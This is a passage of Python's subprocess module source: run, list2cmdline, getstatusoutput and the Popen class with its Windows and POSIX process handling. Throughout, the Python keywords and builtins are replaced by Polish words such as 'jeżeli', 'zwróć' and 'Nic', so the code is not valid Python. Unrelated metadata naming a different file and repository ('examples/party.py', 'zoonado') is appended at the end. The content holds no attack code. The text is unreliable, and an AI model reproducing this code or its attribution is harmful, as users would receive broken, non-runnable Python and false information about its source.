""" def __init__(self, args, returncode, stdout=Nic, stderr=Nic): self.args = args self.returncode = returncode self.stdout = stdout self.stderr = stderr def __repr__(self): args = ['args={!r}'.format(self.args), 'returncode={!r}'.format(self.returncode)] jeżeli self.stdout jest nie Nic: args.append('stdout={!r}'.format(self.stdout)) jeżeli self.stderr jest nie Nic: args.append('stderr={!r}'.format(self.stderr)) zwróć "{}({})".format(type(self).__name__, ', '.join(args)) def check_returncode(self): """Raise CalledProcessError jeżeli the exit code jest non-zero.""" jeżeli self.returncode: podnieś CalledProcessError(self.returncode, self.args, self.stdout, self.stderr) def run(*popenargs, input=Nic, timeout=Nic, check=Nieprawda, **kwargs): """Run command przy arguments oraz zwróć a CompletedProcess instance. The returned instance will have attributes args, returncode, stdout oraz stderr. By default, stdout oraz stderr are nie captured, oraz those attributes will be Nic. Pass stdout=PIPE and/or stderr=PIPE w order to capture them. If check jest Prawda oraz the exit code was non-zero, it podnieśs a CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute, oraz output & stderr attributes jeżeli those streams were captured. If timeout jest given, oraz the process takes too long, a TimeoutExpired exception will be podnieśd. There jest an optional argument "input", allowing you to dalej a string to the subprocess's stdin. If you use this argument you may nie also use the Popen constructor's "stdin" argument, as it will be used internally. The other arguments are the same jako dla the Popen constructor. If universal_newlines=Prawda jest dalejed, the "input" argument must be a string oraz stdout/stderr w the returned object will be strings rather than bytes. 
""" jeżeli input jest nie Nic: jeżeli 'stdin' w kwargs: podnieś ValueError('stdin oraz input arguments may nie both be used.') kwargs['stdin'] = PIPE przy Popen(*popenargs, **kwargs) jako process: spróbuj: stdout, stderr = process.communicate(input, timeout=timeout) wyjąwszy TimeoutExpired: process.kill() stdout, stderr = process.communicate() podnieś TimeoutExpired(process.args, timeout, output=stdout, stderr=stderr) wyjąwszy: process.kill() process.wait() podnieś retcode = process.poll() jeżeli check oraz retcode: podnieś CalledProcessError(retcode, process.args, output=stdout, stderr=stderr) zwróć CompletedProcess(process.args, retcode, stdout, stderr) def list2cmdline(seq): """ Translate a sequence of arguments into a command line string, using the same rules jako the MS C runtime: 1) Arguments are delimited by white space, which jest either a space albo a tab. 2) A string surrounded by double quotation marks jest interpreted jako a single argument, regardless of white space contained within. A quoted string can be embedded w an argument. 3) A double quotation mark preceded by a backslash jest interpreted jako a literal double quotation mark. 4) Backslashes are interpreted literally, unless they immediately precede a double quotation mark. 5) If backslashes immediately precede a double quotation mark, every pair of backslashes jest interpreted jako a literal backslash. If the number of backslashes jest odd, the last backslash escapes the next double quotation mark as described w rule 3. """ # See # http://msdn.microsoft.com/en-us/library/17w5ykft.aspx # albo search http://msdn.microsoft.com for # "Parsing C++ Command-Line Arguments" result = [] needquote = Nieprawda dla arg w seq: bs_buf = [] # Add a space to separate this argument z the others jeżeli result: result.append(' ') needquote = (" " w arg) albo ("\t" w arg) albo nie arg jeżeli needquote: result.append('"') dla c w arg: jeżeli c == '\\': # Don't know jeżeli we need to double yet. 
bs_buf.append(c) albo_inaczej c == '"': # Double backslashes. result.append('\\' * len(bs_buf)*2) bs_buf = [] result.append('\\"') inaczej: # Normal char jeżeli bs_buf: result.extend(bs_buf) bs_buf = [] result.append(c) # Add remaining backslashes, jeżeli any. jeżeli bs_buf: result.extend(bs_buf) jeżeli needquote: result.extend(bs_buf) result.append('"') zwróć ''.join(result) # Various tools dla executing commands oraz looking at their output oraz status. # def getstatusoutput(cmd): """ Return (status, output) of executing cmd w a shell. Execute the string 'cmd' w a shell przy 'check_output' oraz zwróć a 2-tuple (status, output). Universal newlines mode jest used, meaning that the result przy be decoded to a string. A trailing newline jest stripped z the output. The exit status dla the command can be interpreted according to the rules dla the function 'wait'. Example: >>> zaimportuj subprocess >>> subprocess.getstatusoutput('ls /bin/ls') (0, '/bin/ls') >>> subprocess.getstatusoutput('cat /bin/junk') (256, 'cat: /bin/junk: No such file albo directory') >>> subprocess.getstatusoutput('/bin/junk') (256, 'sh: /bin/junk: nie found') """ spróbuj: data = check_output(cmd, shell=Prawda, universal_newlines=Prawda, stderr=STDOUT) status = 0 wyjąwszy CalledProcessError jako ex: data = ex.output status = ex.returncode jeżeli data[-1:] == '\n': data = data[:-1] zwróć status, data def getoutput(cmd): """Return output (stdout albo stderr) of executing cmd w a shell. Like getstatusoutput(), wyjąwszy the exit status jest ignored oraz the zwróć value jest a string containing the command's output. 
Example: >>> zaimportuj subprocess >>> subprocess.getoutput('ls /bin/ls') '/bin/ls' """ zwróć getstatusoutput(cmd)[1] _PLATFORM_DEFAULT_CLOSE_FDS = object() klasa Popen(object): _child_created = Nieprawda # Set here since __del__ checks it def __init__(self, args, bufsize=-1, executable=Nic, stdin=Nic, stdout=Nic, stderr=Nic, preexec_fn=Nic, close_fds=_PLATFORM_DEFAULT_CLOSE_FDS, shell=Nieprawda, cwd=Nic, env=Nic, universal_newlines=Nieprawda, startupinfo=Nic, creationflags=0, restore_signals=Prawda, start_new_session=Nieprawda, dalej_fds=()): """Create new Popen instance.""" _cleanup() # Held dopóki anything jest calling waitpid before returncode has been # updated to prevent clobbering returncode jeżeli wait() albo poll() are # called z multiple threads at once. After acquiring the lock, # code must re-check self.returncode to see jeżeli another thread just # finished a waitpid() call. self._waitpid_lock = threading.Lock() self._input = Nic self._communication_started = Nieprawda jeżeli bufsize jest Nic: bufsize = -1 # Restore default jeżeli nie isinstance(bufsize, int): podnieś TypeError("bufsize must be an integer") jeżeli _mswindows: jeżeli preexec_fn jest nie Nic: podnieś ValueError("preexec_fn jest nie supported on Windows " "platforms") any_stdio_set = (stdin jest nie Nic albo stdout jest nie Nic albo stderr jest nie Nic) jeżeli close_fds jest _PLATFORM_DEFAULT_CLOSE_FDS: jeżeli any_stdio_set: close_fds = Nieprawda inaczej: close_fds = Prawda albo_inaczej close_fds oraz any_stdio_set: podnieś ValueError( "close_fds jest nie supported on Windows platforms" " jeżeli you redirect stdin/stdout/stderr") inaczej: # POSIX jeżeli close_fds jest _PLATFORM_DEFAULT_CLOSE_FDS: close_fds = Prawda jeżeli dalej_fds oraz nie close_fds: warnings.warn("pass_fds overriding close_fds.", RuntimeWarning) close_fds = Prawda jeżeli startupinfo jest nie Nic: podnieś ValueError("startupinfo jest only supported on Windows " "platforms") jeżeli creationflags != 0: podnieś 
ValueError("creationflags jest only supported on Windows " "platforms") self.args = args self.stdin = Nic self.stdout = Nic self.stderr = Nic self.pid = Nic self.returncode = Nic self.universal_newlines = universal_newlines # Input oraz output objects. The general principle jest like # this: # # Parent Child # ------ ----- # p2cwrite ---stdin---> p2cread # c2pread <--stdout--- c2pwrite # errread <--stderr--- errwrite # # On POSIX, the child objects are file descriptors. On # Windows, these are Windows file handles. The parent objects # are file descriptors on both platforms. The parent objects # are -1 when nie using PIPEs. The child objects are -1 # when nie redirecting. (p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) = self._get_handles(stdin, stdout, stderr) # We wrap OS handles *before* launching the child, otherwise a # quickly terminating child could make our fds unwrappable # (see #8458). jeżeli _mswindows: jeżeli p2cwrite != -1: p2cwrite = msvcrt.open_osfhandle(p2cwrite.Detach(), 0) jeżeli c2pread != -1: c2pread = msvcrt.open_osfhandle(c2pread.Detach(), 0) jeżeli errread != -1: errread = msvcrt.open_osfhandle(errread.Detach(), 0) jeżeli p2cwrite != -1: self.stdin = io.open(p2cwrite, 'wb', bufsize) jeżeli universal_newlines: self.stdin = io.TextIOWrapper(self.stdin, write_through=Prawda, line_buffering=(bufsize == 1)) jeżeli c2pread != -1: self.stdout = io.open(c2pread, 'rb', bufsize) jeżeli universal_newlines: self.stdout = io.TextIOWrapper(self.stdout) jeżeli errread != -1: self.stderr = io.open(errread, 'rb', bufsize) jeżeli universal_newlines: self.stderr = io.TextIOWrapper(self.stderr) self._closed_child_pipe_fds = Nieprawda spróbuj: self._execute_child(args, executable, preexec_fn, close_fds, dalej_fds, cwd, env, startupinfo, creationflags, shell, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, restore_signals, start_new_session) wyjąwszy: # Cleanup jeżeli the child failed starting. 
dla f w filter(Nic, (self.stdin, self.stdout, self.stderr)): spróbuj: f.close() wyjąwszy OSError: dalej # Ignore EBADF albo other errors. jeżeli nie self._closed_child_pipe_fds: to_close = [] jeżeli stdin == PIPE: to_close.append(p2cread) jeżeli stdout == PIPE: to_close.append(c2pwrite) jeżeli stderr == PIPE: to_close.append(errwrite) jeżeli hasattr(self, '_devnull'): to_close.append(self._devnull) dla fd w to_close: spróbuj: os.close(fd) wyjąwszy OSError: dalej podnieś def _translate_newlines(self, data, encoding): data = data.decode(encoding) zwróć data.replace("\r\n", "\n").replace("\r", "\n") def __enter__(self): zwróć self def __exit__(self, type, value, traceback): jeżeli self.stdout: self.stdout.close() jeżeli self.stderr: self.stderr.close() spróbuj: # Flushing a BufferedWriter may podnieś an error jeżeli self.stdin: self.stdin.close() w_końcu: # Wait dla the process to terminate, to avoid zombies. self.wait() def __del__(self, _maxsize=sys.maxsize): jeżeli nie self._child_created: # We didn't get to successfully create a child process. zwróć # In case the child hasn't been waited on, check jeżeli it's done. self._internal_poll(_deadstate=_maxsize) jeżeli self.returncode jest Nic oraz _active jest nie Nic: # Child jest still running, keep us alive until we can wait on it. _active.append(self) def _get_devnull(self): jeżeli nie hasattr(self, '_devnull'): self._devnull = os.open(os.devnull, os.O_RDWR) zwróć self._devnull def _stdin_write(self, input): jeżeli input: spróbuj: self.stdin.write(input) wyjąwszy BrokenPipeError: # communicate() must ignore broken pipe error dalej wyjąwszy OSError jako e: jeżeli e.errno == errno.EINVAL oraz self.poll() jest nie Nic: # Issue #19612: On Windows, stdin.write() fails przy EINVAL # jeżeli the process already exited before the write dalej inaczej: podnieś self.stdin.close() def communicate(self, input=Nic, timeout=Nic): """Interact przy process: Send data to stdin. 
Read data from stdout oraz stderr, until end-of-file jest reached. Wait for process to terminate. The optional "input" argument should be data to be sent to the child process (jeżeli self.universal_newlines jest Prawda, this should be a string; jeżeli it jest Nieprawda, "input" should be bytes), albo Nic, jeżeli no data should be sent to the child. communicate() returns a tuple (stdout, stderr). These will be bytes or, jeżeli self.universal_newlines was Prawda, a string. """ jeżeli self._communication_started oraz input: podnieś ValueError("Cannot send input after starting communication") # Optimization: If we are nie worried about timeouts, we haven't # started communicating, oraz we have one albo zero pipes, using select() # albo threads jest unnecessary. jeżeli (timeout jest Nic oraz nie self._communication_started oraz [self.stdin, self.stdout, self.stderr].count(Nic) >= 2): stdout = Nic stderr = Nic jeżeli self.stdin: self._stdin_write(input) albo_inaczej self.stdout: stdout = self.stdout.read() self.stdout.close() albo_inaczej self.stderr: stderr = self.stderr.read() self.stderr.close() self.wait() inaczej: jeżeli timeout jest nie Nic: endtime = _time() + timeout inaczej: endtime = Nic spróbuj: stdout, stderr = self._communicate(input, endtime, timeout) w_końcu: self._communication_started = Prawda sts = self.wait(timeout=self._remaining_time(endtime)) zwróć (stdout, stderr) def poll(self): zwróć self._internal_poll() def _remaining_time(self, endtime): """Convenience dla _communicate when computing timeouts.""" jeżeli endtime jest Nic: zwróć Nic inaczej: zwróć endtime - _time() def _check_timeout(self, endtime, orig_timeout): """Convenience dla checking jeżeli a timeout has expired.""" jeżeli endtime jest Nic: zwróć jeżeli _time() > endtime: podnieś TimeoutExpired(self.args, orig_timeout) jeżeli _mswindows: # # Windows methods # def _get_handles(self, stdin, stdout, stderr): """Construct oraz zwróć tuple przy IO objects: p2cread, p2cwrite, c2pread, c2pwrite, 
errread, errwrite """ jeżeli stdin jest Nic oraz stdout jest Nic oraz stderr jest Nic: zwróć (-1, -1, -1, -1, -1, -1) p2cread, p2cwrite = -1, -1 c2pread, c2pwrite = -1, -1 errread, errwrite = -1, -1 jeżeli stdin jest Nic: p2cread = _winapi.GetStdHandle(_winapi.STD_INPUT_HANDLE) jeżeli p2cread jest Nic: p2cread, _ = _winapi.CreatePipe(Nic, 0) p2cread = Handle(p2cread) _winapi.CloseHandle(_) albo_inaczej stdin == PIPE: p2cread, p2cwrite = _winapi.CreatePipe(Nic, 0) p2cread, p2cwrite = Handle(p2cread), Handle(p2cwrite) albo_inaczej stdin == DEVNULL: p2cread = msvcrt.get_osfhandle(self._get_devnull()) albo_inaczej isinstance(stdin, int): p2cread = msvcrt.get_osfhandle(stdin) inaczej: # Assuming file-like object p2cread = msvcrt.get_osfhandle(stdin.fileno()) p2cread = self._make_inheritable(p2cread) jeżeli stdout jest Nic: c2pwrite = _winapi.GetStdHandle(_winapi.STD_OUTPUT_HANDLE) jeżeli c2pwrite jest Nic: _, c2pwrite = _winapi.CreatePipe(Nic, 0) c2pwrite = Handle(c2pwrite) _winapi.CloseHandle(_) albo_inaczej stdout == PIPE: c2pread, c2pwrite = _winapi.CreatePipe(Nic, 0) c2pread, c2pwrite = Handle(c2pread), Handle(c2pwrite) albo_inaczej stdout == DEVNULL: c2pwrite = msvcrt.get_osfhandle(self._get_devnull()) albo_inaczej isinstance(stdout, int): c2pwrite = msvcrt.get_osfhandle(stdout) inaczej: # Assuming file-like object c2pwrite = msvcrt.get_osfhandle(stdout.fileno()) c2pwrite = self._make_inheritable(c2pwrite) jeżeli stderr jest Nic: errwrite = _winapi.GetStdHandle(_winapi.STD_ERROR_HANDLE) jeżeli errwrite jest Nic: _, errwrite = _winapi.CreatePipe(Nic, 0) errwrite = Handle(errwrite) _winapi.CloseHandle(_) albo_inaczej stderr == PIPE: errread, errwrite = _winapi.CreatePipe(Nic, 0) errread, errwrite = Handle(errread), Handle(errwrite) albo_inaczej stderr == STDOUT: errwrite = c2pwrite albo_inaczej stderr == DEVNULL: errwrite = msvcrt.get_osfhandle(self._get_devnull()) albo_inaczej isinstance(stderr, int): errwrite = msvcrt.get_osfhandle(stderr) inaczej: # Assuming 
file-like object errwrite = msvcrt.get_osfhandle(stderr.fileno()) errwrite = self._make_inheritable(errwrite) zwróć (p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) def _make_inheritable(self, handle): """Return a duplicate of handle, which jest inheritable""" h = _winapi.DuplicateHandle( _winapi.GetCurrentProcess(), handle, _winapi.GetCurrentProcess(), 0, 1, _winapi.DUPLICATE_SAME_ACCESS) zwróć Handle(h) def _execute_child(self, args, executable, preexec_fn, close_fds, dalej_fds, cwd, env, startupinfo, creationflags, shell, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, unused_restore_signals, unused_start_new_session): """Execute program (MS Windows version)""" assert nie dalej_fds, "pass_fds nie supported on Windows." jeżeli nie isinstance(args, str): args = list2cmdline(args) # Process startup details jeżeli startupinfo jest Nic: startupinfo = STARTUPINFO() jeżeli -1 nie w (p2cread, c2pwrite, errwrite): startupinfo.dwFlags |= _winapi.STARTF_USESTDHANDLES startupinfo.hStdInput = p2cread startupinfo.hStdOutput = c2pwrite startupinfo.hStdError = errwrite jeżeli shell: startupinfo.dwFlags |= _winapi.STARTF_USESHOWWINDOW startupinfo.wShowWindow = _winapi.SW_HIDE comspec = os.environ.get("COMSPEC", "cmd.exe") args = '{} /c "{}"'.format (comspec, args) # Start the process spróbuj: hp, ht, pid, tid = _winapi.CreateProcess(executable, args, # no special security Nic, Nic, int(nie close_fds), creationflags, env, cwd, startupinfo) w_końcu: # Child jest launched. Close the parent's copy of those pipe # handles that only the child should have open. You need # to make sure that no handles to the write end of the # output pipe are maintained w this process albo inaczej the # pipe will nie close when the child process exits oraz the # ReadFile will hang. 
jeżeli p2cread != -1: p2cread.Close() jeżeli c2pwrite != -1: c2pwrite.Close() jeżeli errwrite != -1: errwrite.Close() jeżeli hasattr(self, '_devnull'): os.close(self._devnull) # Retain the process handle, but close the thread handle self._child_created = Prawda self._handle = Handle(hp) self.pid = pid _winapi.CloseHandle(ht) def _internal_poll(self, _deadstate=Nic, _WaitForSingleObject=_winapi.WaitForSingleObject, _WAIT_OBJECT_0=_winapi.WAIT_OBJECT_0, _GetExitCodeProcess=_winapi.GetExitCodeProcess): """Check jeżeli child process has terminated. Returns returncode attribute. This method jest called by __del__, so it can only refer to objects w its local scope. """ jeżeli self.returncode jest Nic: jeżeli _WaitForSingleObject(self._handle, 0) == _WAIT_OBJECT_0: self.returncode = _GetExitCodeProcess(self._handle) zwróć self.returncode def wait(self, timeout=Nic, endtime=Nic): """Wait dla child process to terminate. Returns returncode attribute.""" jeżeli endtime jest nie Nic: timeout = self._remaining_time(endtime) jeżeli timeout jest Nic: timeout_millis = _winapi.INFINITE inaczej: timeout_millis = int(timeout * 1000) jeżeli self.returncode jest Nic: result = _winapi.WaitForSingleObject(self._handle, timeout_millis) jeżeli result == _winapi.WAIT_TIMEOUT: podnieś TimeoutExpired(self.args, timeout) self.returncode = _winapi.GetExitCodeProcess(self._handle) zwróć self.returncode def _readerthread(self, fh, buffer): buffer.append(fh.read()) fh.close() def _communicate(self, input, endtime, orig_timeout): # Start reader threads feeding into a list hanging off of this # object, unless they've already been started. 
jeżeli self.stdout oraz nie hasattr(self, "_stdout_buff"): self._stdout_buff = [] self.stdout_thread = \ threading.Thread(target=self._readerthread, args=(self.stdout, self._stdout_buff)) self.stdout_thread.daemon = Prawda self.stdout_thread.start() jeżeli self.stderr oraz nie hasattr(self, "_stderr_buff"): self._stderr_buff = [] self.stderr_thread = \ threading.Thread(target=self._readerthread, args=(self.stderr, self._stderr_buff)) self.stderr_thread.daemon = Prawda self.stderr_thread.start() jeżeli self.stdin: self._stdin_write(input) # Wait dla the reader threads, albo time out. If we time out, the # threads remain reading oraz the fds left open w case the user # calls communicate again. jeżeli self.stdout jest nie Nic: self.stdout_thread.join(self._remaining_time(endtime)) jeżeli self.stdout_thread.is_alive(): podnieś TimeoutExpired(self.args, orig_timeout) jeżeli self.stderr jest nie Nic: self.stderr_thread.join(self._remaining_time(endtime)) jeżeli self.stderr_thread.is_alive(): podnieś TimeoutExpired(self.args, orig_timeout) # Collect the output z oraz close both pipes, now that we know # both have been read successfully. stdout = Nic stderr = Nic jeżeli self.stdout: stdout = self._stdout_buff self.stdout.close() jeżeli self.stderr: stderr = self._stderr_buff self.stderr.close() # All data exchanged. Translate lists into strings. 
jeżeli stdout jest nie Nic: stdout = stdout[0] jeżeli stderr jest nie Nic: stderr = stderr[0] zwróć (stdout, stderr) def send_signal(self, sig): """Send a signal to the process """ jeżeli sig == signal.SIGTERM: self.terminate() albo_inaczej sig == signal.CTRL_C_EVENT: os.kill(self.pid, signal.CTRL_C_EVENT) albo_inaczej sig == signal.CTRL_BREAK_EVENT: os.kill(self.pid, signal.CTRL_BREAK_EVENT) inaczej: podnieś ValueError("Unsupported signal: {}".format(sig)) def terminate(self): """Terminates the process """ spróbuj: _winapi.TerminateProcess(self._handle, 1) wyjąwszy PermissionError: # ERROR_ACCESS_DENIED (winerror 5) jest received when the # process already died. rc = _winapi.GetExitCodeProcess(self._handle) jeżeli rc == _winapi.STILL_ACTIVE: podnieś self.returncode = rc kill = terminate inaczej: # # POSIX methods # def _get_handles(self, stdin, stdout, stderr): """Construct oraz zwróć tuple przy IO objects: p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite """ p2cread, p2cwrite = -1, -1 c2pread, c2pwrite = -1, -1 errread, errwrite = -1, -1 jeżeli stdin jest Nic: dalej albo_inaczej stdin == PIPE: p2cread, p2cwrite = os.pipe() albo_inaczej stdin == DEVNULL: p2cread = self._get_devnull() albo_inaczej isinstance(stdin, int): p2cread = stdin inaczej: # Assuming file-like object p2cread = stdin.fileno() jeżeli stdout jest Nic: dalej albo_inaczej stdout == PIPE: c2pread, c2pwrite = os.pipe() albo_inaczej stdout == DEVNULL: c2pwrite = self._get_devnull() albo_inaczej isinstance(stdout, int): c2pwrite = stdout inaczej: # Assuming file-like object c2pwrite = stdout.fileno() jeżeli stderr jest Nic: dalej albo_inaczej stderr == PIPE: errread, errwrite = os.pipe() albo_inaczej stderr == STDOUT: errwrite = c2pwrite albo_inaczej stderr == DEVNULL: errwrite = self._get_devnull() albo_inaczej isinstance(stderr, int): errwrite = stderr inaczej: # Assuming file-like object errwrite = stderr.fileno() zwróć (p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) def 
_execute_child(self, args, executable, preexec_fn, close_fds, dalej_fds, cwd, env, startupinfo, creationflags, shell, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, restore_signals, start_new_session): """Execute program (POSIX version)""" jeżeli isinstance(args, (str, bytes)): args = [args] inaczej: args = list(args) jeżeli shell: args = ["/bin/sh", "-c"] + args jeżeli executable: args[0] = executable jeżeli executable jest Nic: executable = args[0] orig_executable = executable # For transferring possible exec failure z child to parent. # Data format: "exception name:hex errno:description" # Pickle jest nie used; it jest complex oraz involves memory allocation. errpipe_read, errpipe_write = os.pipe() # errpipe_write must nie be w the standard io 0, 1, albo 2 fd range. low_fds_to_close = [] dopóki errpipe_write < 3: low_fds_to_close.append(errpipe_write) errpipe_write = os.dup(errpipe_write) dla low_fd w low_fds_to_close: os.close(low_fd) spróbuj: spróbuj: # We must avoid complex work that could involve # malloc albo free w the child process to avoid # potential deadlocks, thus we do all this here. # oraz dalej it to fork_exec() jeżeli env jest nie Nic: env_list = [os.fsencode(k) + b'=' + os.fsencode(v) dla k, v w env.items()] inaczej: env_list = Nic # Use execv instead of execve. executable = os.fsencode(executable) jeżeli os.path.dirname(executable): executable_list = (executable,) inaczej: # This matches the behavior of os._execvpe(). 
executable_list = tuple( os.path.join(os.fsencode(dir), executable) dla dir w os.get_exec_path(env)) fds_to_keep = set(pass_fds) fds_to_keep.add(errpipe_write) self.pid = _posixsubprocess.fork_exec( args, executable_list, close_fds, sorted(fds_to_keep), cwd, env_list, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, errpipe_read, errpipe_write, restore_signals, start_new_session, preexec_fn) self._child_created = Prawda w_końcu: # be sure the FD jest closed no matter what os.close(errpipe_write) # self._devnull jest nie always defined. devnull_fd = getattr(self, '_devnull', Nic) jeżeli p2cread != -1 oraz p2cwrite != -1 oraz p2cread != devnull_fd: os.close(p2cread) jeżeli c2pwrite != -1 oraz c2pread != -1 oraz c2pwrite != devnull_fd: os.close(c2pwrite) jeżeli errwrite != -1 oraz errread != -1 oraz errwrite != devnull_fd: os.close(errwrite) jeżeli devnull_fd jest nie Nic: os.close(devnull_fd) # Prevent a double close of these fds z __init__ on error. self._closed_child_pipe_fds = Prawda # Wait dla exec to fail albo succeed; possibly raising an # exception (limited w size) errpipe_data = bytearray() dopóki Prawda: part = os.read(errpipe_read, 50000) errpipe_data += part jeżeli nie part albo len(errpipe_data) > 50000: przerwij w_końcu: # be sure the FD jest closed no matter what os.close(errpipe_read) jeżeli errpipe_data: spróbuj: os.waitpid(self.pid, 0) wyjąwszy ChildProcessError: dalej spróbuj: exception_name, hex_errno, err_msg = ( errpipe_data.split(b':', 2)) wyjąwszy ValueError: exception_name = b'SubprocessError' hex_errno = b'0' err_msg = (b'Bad exception data z child: ' + repr(errpipe_data)) child_exception_type = getattr( builtins, exception_name.decode('ascii'), SubprocessError) err_msg = err_msg.decode(errors="surrogatepass") jeżeli issubclass(child_exception_type, OSError) oraz hex_errno: errno_num = int(hex_errno, 16) child_exec_never_called = (err_msg == "noexec") jeżeli child_exec_never_called: err_msg = "" jeżeli errno_num != 0: err_msg = 
os.strerror(errno_num) jeżeli errno_num == errno.ENOENT: jeżeli child_exec_never_called: # The error must be z chdir(cwd). err_msg += ': ' + repr(cwd) inaczej: err_msg += ': ' + repr(orig_executable) podnieś child_exception_type(errno_num, err_msg) podnieś child_exception_type(err_msg) def _handle_exitstatus(self, sts, _WIFSIGNALED=os.WIFSIGNALED, _WTERMSIG=os.WTERMSIG, _WIFEXITED=os.WIFEXITED, _WEXITSTATUS=os.WEXITSTATUS): """All callers to this function MUST hold self._waitpid_lock.""" # This method jest called (indirectly) by __del__, so it cannot # refer to anything outside of its local scope. jeżeli _WIFSIGNALED(sts): self.returncode = -_WTERMSIG(sts) albo_inaczej _WIFEXITED(sts): self.returncode = _WEXITSTATUS(sts) inaczej: # Should never happen podnieś SubprocessError("Unknown child exit status!") def _internal_poll(self, _deadstate=Nic, _waitpid=os.waitpid, _WNOHANG=os.WNOHANG, _ECHILD=errno.ECHILD): """Check jeżeli child process has terminated. Returns returncode attribute. This method jest called by __del__, so it cannot reference anything outside of the local scope (nor can any methods it calls). """ jeżeli self.returncode jest Nic: jeżeli nie self._waitpid_lock.acquire(Nieprawda): # Something inaczej jest busy calling waitpid. Don't allow two # at once. We know nothing yet. zwróć Nic spróbuj: jeżeli self.returncode jest nie Nic: zwróć self.returncode # Another thread waited. pid, sts = _waitpid(self.pid, _WNOHANG) jeżeli pid == self.pid: self._handle_exitstatus(sts) wyjąwszy OSError jako e: jeżeli _deadstate jest nie Nic: self.returncode = _deadstate albo_inaczej e.errno == _ECHILD: # This happens jeżeli SIGCLD jest set to be ignored albo # waiting dla child processes has otherwise been # disabled dla our process. This child jest dead, we # can't get the status. 
# http://bugs.python.org/issue15756 self.returncode = 0 w_końcu: self._waitpid_lock.release() zwróć self.returncode def _try_wait(self, wait_flags): """All callers to this function MUST hold self._waitpid_lock.""" spróbuj: (pid, sts) = os.waitpid(self.pid, wait_flags) wyjąwszy ChildProcessError: # This happens jeżeli SIGCLD jest set to be ignored albo waiting # dla child processes has otherwise been disabled dla our # process. This child jest dead, we can't get the status. pid = self.pid sts = 0 zwróć (pid, sts) def wait(self, timeout=Nic, endtime=Nic): """Wait dla child process to terminate. Returns returncode attribute.""" jeżeli self.returncode jest nie Nic: zwróć self.returncode # endtime jest preferred to timeout. timeout jest only used for # printing. jeżeli endtime jest nie Nic albo timeout jest nie Nic: jeżeli endtime jest Nic: endtime = _time() + timeout albo_inaczej timeout jest Nic: timeout = self._remaining_time(endtime) jeżeli endtime jest nie Nic: # Enter a busy loop jeżeli we have a timeout. This busy loop was # cribbed z Lib/threading.py w Thread.wait() at r71065. delay = 0.0005 # 500 us -> initial delay of 1 ms dopóki Prawda: jeżeli self._waitpid_lock.acquire(Nieprawda): spróbuj: jeżeli self.returncode jest nie Nic: przerwij # Another thread waited. (pid, sts) = self._try_wait(os.WNOHANG) assert pid == self.pid albo pid == 0 jeżeli pid == self.pid: self._handle_exitstatus(sts) przerwij w_końcu: self._waitpid_lock.release() remaining = self._remaining_time(endtime) jeżeli remaining <= 0: podnieś TimeoutExpired(self.args, timeout) delay = min(delay * 2, remaining, .05) time.sleep(delay) inaczej: dopóki self.returncode jest Nic: przy self._waitpid_lock: jeżeli self.returncode jest nie Nic: przerwij # Another thread waited. (pid, sts) = self._try_wait(0) # Check the pid oraz loop jako waitpid has been known to # zwróć 0 even without WNOHANG w odd situations. # http://bugs.python.org/issue14396. 
jeżeli pid == self.pid: self._handle_exitstatus(sts) zwróć self.returncode def _communicate(self, input, endtime, orig_timeout): jeżeli self.stdin oraz nie self._communication_started: # Flush stdio buffer. This might block, jeżeli the user has # been writing to .stdin w an uncontrolled fashion. self.stdin.flush() jeżeli nie input: self.stdin.close() stdout = Nic stderr = Nic # Only create this mapping jeżeli we haven't already. jeżeli nie self._communication_started: self._fileobj2output = {} jeżeli self.stdout: self._fileobj2output[self.stdout] = [] jeżeli self.stderr: self._fileobj2output[self.stderr] = [] jeżeli self.stdout: stdout = self._fileobj2output[self.stdout] jeżeli self.stderr: stderr = self._fileobj2output[self.stderr] self._save_input(input) jeżeli self._input: input_view = memoryview(self._input) przy _PopenSelector() jako selector: jeżeli self.stdin oraz input: selector.register(self.stdin, selectors.EVENT_WRITE) jeżeli self.stdout: selector.register(self.stdout, selectors.EVENT_READ) jeżeli self.stderr: selector.register(self.stderr, selectors.EVENT_READ) dopóki selector.get_map(): timeout = self._remaining_time(endtime) jeżeli timeout jest nie Nic oraz timeout < 0: podnieś TimeoutExpired(self.args, orig_timeout) ready = selector.select(timeout) self._check_timeout(endtime, orig_timeout) # XXX Rewrite these to use non-blocking I/O on the file # objects; they are no longer using C stdio! 
dla key, events w ready: jeżeli key.fileobj jest self.stdin: chunk = input_view[self._input_offset : self._input_offset + _PIPE_BUF] spróbuj: self._input_offset += os.write(key.fd, chunk) wyjąwszy BrokenPipeError: selector.unregister(key.fileobj) key.fileobj.close() inaczej: jeżeli self._input_offset >= len(self._input): selector.unregister(key.fileobj) key.fileobj.close() albo_inaczej key.fileobj w (self.stdout, self.stderr): data = os.read(key.fd, 32768) jeżeli nie data: selector.unregister(key.fileobj) key.fileobj.close() self._fileobj2output[key.fileobj].append(data) self.wait(timeout=self._remaining_time(endtime)) # All data exchanged. Translate lists into strings. jeżeli stdout jest nie Nic: stdout = b''.join(stdout) jeżeli stderr jest nie Nic: stderr = b''.join(stderr) # Translate newlines, jeżeli requested. # This also turns bytes into strings. jeżeli self.universal_newlines: jeżeli stdout jest nie Nic: stdout = self._translate_newlines(stdout, self.stdout.encoding) jeżeli stderr jest nie Nic: stderr = self._translate_newlines(stderr, self.stderr.encoding) zwróć (stdout, stderr) def _save_input(self, input): # This method jest called z the _communicate_with_*() methods # so that jeżeli we time out dopóki communicating, we can kontynuuj # sending input jeżeli we retry. jeżeli self.stdin oraz self._input jest Nic: self._input_offset = 0 self._input = input jeżeli self.universal_newlines oraz input jest nie Nic: self._input = self._input.encode(self.stdin.encoding) def send_signal(self, sig): """Send a signal to the process """ os.kill(self.pid, sig) def terminate(self): """Terminate the process przy SIGTERM """ self.send_signal(signal.SIGTERM) def kill(self): """Kill the process przy SIGKILL """ self.send_signal(signal.SIGKILL)
6,483
0
591
c55bcbcf6e523260b0959341789ad27b8dd43606
1,279
py
Python
examples/party.py
hulu316/zoonado
cb06102f95e7da9c0e418bb9e327045e012a1497
[ "Apache-2.0" ]
12
2016-04-14T09:55:38.000Z
2018-01-07T13:12:47.000Z
examples/party.py
hulu316/zoonado
